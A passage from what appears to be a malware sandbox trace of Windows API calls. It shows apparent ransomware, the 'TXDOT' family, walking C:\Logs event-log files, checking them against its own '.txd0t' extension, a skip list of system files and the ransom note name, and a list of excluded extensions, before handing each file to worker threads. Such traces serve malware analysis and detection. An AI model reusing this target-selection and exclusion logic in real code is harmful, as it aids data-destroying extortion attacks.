(psz1=".evtx", psz2=".txd0t") returned -1 [0089.385] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0089.385] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0089.385] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0089.385] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0089.385] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=" ransom ") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="debug.txt") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="boot.ini") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntldr") returned -1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0089.386] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.386] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned=".evtx" [0089.386] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.386] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.409] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.409] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0089.409] SetEvent (hEvent=0x3fc) returned 1 [0089.409] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0089.409] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=".") returned 1 [0089.409] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="..") returned 1 [0089.409] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.410] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.410] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0089.410] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned=".evtx" [0089.410] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=" ransom ") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="debug.txt") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="boot.ini") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntldr") returned -1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.410] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.410] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned=".evtx" [0089.410] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.410] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.413] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.413] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0089.413] SetEvent (hEvent=0x410) returned 1 [0089.413] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0089.413] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=".") returned 1 [0089.413] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="..") returned 1 [0089.413] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.413] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.413] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0089.414] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned=".evtx" [0089.414] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=" ransom ") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="debug.txt") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="boot.ini") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntldr") returned -1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0089.414] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.414] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned=".evtx" [0089.414] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.414] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.428] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.429] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0089.429] SetEvent (hEvent=0x3fc) returned 1 [0089.429] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0089.429] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=".") returned 1 [0089.429] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="..") returned 1 [0089.429] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.429] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.429] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0089.429] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned=".evtx" [0089.429] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=" ransom ") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="debug.txt") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="boot.ini") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntldr") returned -1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.429] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.429] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned=".evtx" [0089.429] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.429] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.441] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.441] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0089.441] SetEvent (hEvent=0x3fc) returned 1 [0089.441] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0089.441] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=".") returned 1 [0089.442] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="..") returned 1 [0089.442] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.442] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.442] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TWinUI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" [0089.442] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx") returned=".evtx" [0089.442] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=" ransom ") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="debug.txt") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="boot.ini") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntldr") returned -1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.442] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.442] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx") returned=".evtx" [0089.442] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.442] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.453] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.453] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" [0089.453] SetEvent (hEvent=0x3fc) returned 1 [0089.453] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0089.453] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=".") returned 1 [0089.453] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="..") returned 1 [0089.453] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.453] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.453] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-User Profile Service%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" [0089.453] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx") returned=".evtx" [0089.453] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=" ransom ") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="debug.txt") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="boot.ini") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntldr") returned -1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.453] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.454] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.454] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx") returned=".evtx" [0089.454] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.454] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.463] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.463] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" [0089.463] SetEvent (hEvent=0x3fc) returned 1 [0089.463] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0089.463] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=".") returned 1 [0089.463] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="..") returned 1 [0089.463] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.463] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.463] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0089.463] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned=".evtx" [0089.463] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="bootsect.bak") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="iconcache.db") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="thumbs.db") returned -1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=" ransomware ") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=" ransom ") returned 1 [0089.463] StrCmpIW 